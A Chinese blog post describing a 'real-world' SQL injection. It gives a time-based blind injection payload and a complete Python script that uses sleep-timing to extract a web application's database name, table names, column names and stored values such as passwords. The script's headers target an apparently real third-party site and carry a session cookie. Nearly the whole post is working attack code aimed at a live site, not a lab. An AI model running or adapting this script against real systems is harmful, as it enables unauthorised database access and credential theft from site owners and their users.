实战SQL注入案例
记录一次实战
1、在测试中,使用awvs发现SQL注入点,使用sqlmap工具无法跑出结果
提示payload: (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2、编写python脚本
import requests
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning,InsecurePlatformWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!"
result=""
def get_data_len():
for i in range(0,30):
time.sleep(1)
newr="""(select(0)from(select(IF(length(database())={0},sleep(5),0)))v)/*'+(select(0)from(select(IF(length(database())={0},sleep(5),0)))v)+'"+(select(0)from(select(IF(length(database())={0},sleep(5),0)))v)+"*/""".format(i)
payload = newr
start_time = time.time()
data = {"cid":0,"ontype":2,"page":1,"pid":payload}
html = requests.post(url, data=data,headers=headers, verify=False, allow_redirects=False)
end_time = time.time()
use_time = end_time - start_time
if use_time > 3:
print("...... data's length is :"+ str(i))
return i
def get_data(length):
global result
for n in range(1,length):
for v in value:
time.sleep(1)
data_payload="database()"
newr="""(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)/*'+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+'"+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+"*/""".format(data_payload,n,ord(v))
payload = newr
data = {"cid":0,"ontype":2,"page":1,"pid":payload}
start_time = time.time()
html = requests.post(url, data=data,headers=headers, verify=False, allow_redirects=False)
end_time = time.time()
use_time = end_time - start_time
if use_time >4:
result += v
print("数据库名:"+result)
break
return result
def get_biao_data(length,table_num):
table_name_new=""
biao_flag=0
for n in range(1,length):
for v in value:
time.sleep(1)
biao_flag=0
data_payload="(select table_name from information_schema.tables where table_schema=database() limit {0},1)".format(table_num) #第几个表名
payload = """(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)/*'+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+'"+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+"*/""".format(data_payload,n,ord(v))
data = {"cid":0,"ontype":2,"page":1,"pid":payload}
start_time = time.time()
html = requests.post(url, data=data,headers=headers, verify=False, allow_redirects=False)
end_time = time.time()
use_time = end_time - start_time
if use_time >4:
table_name_new += v
print("第 "+str(table_num)+" 个表名:"+table_name_new)
biao_flag=1
break
if biao_flag==0:
return table_name_new
return table_name_new
def get_data_lie(length,lie_num): #盲注爆列
lie_name_new=""
flag_lie = 0
for n in range(1,length):
for v in value:
flag_lie = 0
lie_payload="(select column_name from information_schema.columns where table_name='re_user' limit {0},1)".format(lie_num)
payload = """(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)/*'+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+'"+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+"*/""".format(lie_payload,n,ord(v))
# print ("test:"+str(payload))
data = {"cid":0,"ontype":2,"page":1,"pid":payload}
start_time = time.time()
html = requests.post(url, data=data,headers=headers, verify=False, allow_redirects=False)
end_time = time.time()
use_time = end_time - start_time
if use_time >4:
lie_name_new += v
print("表名的第"+str(lie_num)+"列名:"+str(lie_name_new)+'\n')
flag_lie = 1
break
if (flag_lie==0):
return lie_name_new
return lie_name_new
def get_data_ziduan(length,ziduan_num,tablet_name_set,lie_name_set):
#global result
ziduan_name_new=""
ziduan_flag=0
for n in range(1,length):
for v in value:
ziduan_flag=0
data_payload="(select {0} from {1} limit {2},1)".format(lie_name_set,tablet_name_set,ziduan_num)
payload = """(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)/*'+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+'"+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+"*/""".format(data_payload,n,ord(v))
data = {"cid":0,"ontype":2,"page":1,"pid":payload}
start_time = time.time()
html = requests.post(url, data=data,headers=headers, verify=False, allow_redirects=False)
end_time = time.time()
use_time = end_time - start_time
if use_time >4:
ziduan_name_new += v
ziduan_flag=1
print("表"+tablet_name_set+"的列"+lie_name_set+"的第 "+str(ziduan_num)+" 个字段:"+str(ziduan_name_new)+'\n')
break
if (ziduan_flag==0):
return ziduan_name_new
return ziduan_name_new
if __name__ == "__main__":
url = "http://127.0.0.1"
headers = {
'X-Requested-With': 'XMLHttpRequest',
'Host': '91xiaojiejie.xyz',
'Content-Length': '34',
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Referer': 'https://91xiaojiejie.xyz/',
'Accept-Encoding': 'gzip,deflate,br',
'Cookie': 'PHPSESSID=vs1odvjn44nh70ve4t0a7grnp7',
}
#爆数据库
# len=get_data_len()
len = 17
data_name=get_data(len)
for table_num in range(0,20): #爆20个表
tablet_name=get_biao_data(20,table_num)
#爆列
# table_num=7
# for lie_num in range(0,10):
# lie_name=get_data_lie(20,lie_num)
#爆字段
# tablet_name_set="xxx"
# lie_name_set="password"
# for ziduan_num in range(0,10):
# ziduan_name=get_data_ziduan(35,ziduan_num,tablet_name_set,lie_name_set)
版权声明:
本站所有文章除特别声明外,均採用 CC BY-NC-SA 4.0 许可协议。转载请注明来自
weehhd!
喜欢就支持一下吧
打赏
微信
支付宝
微信
支付宝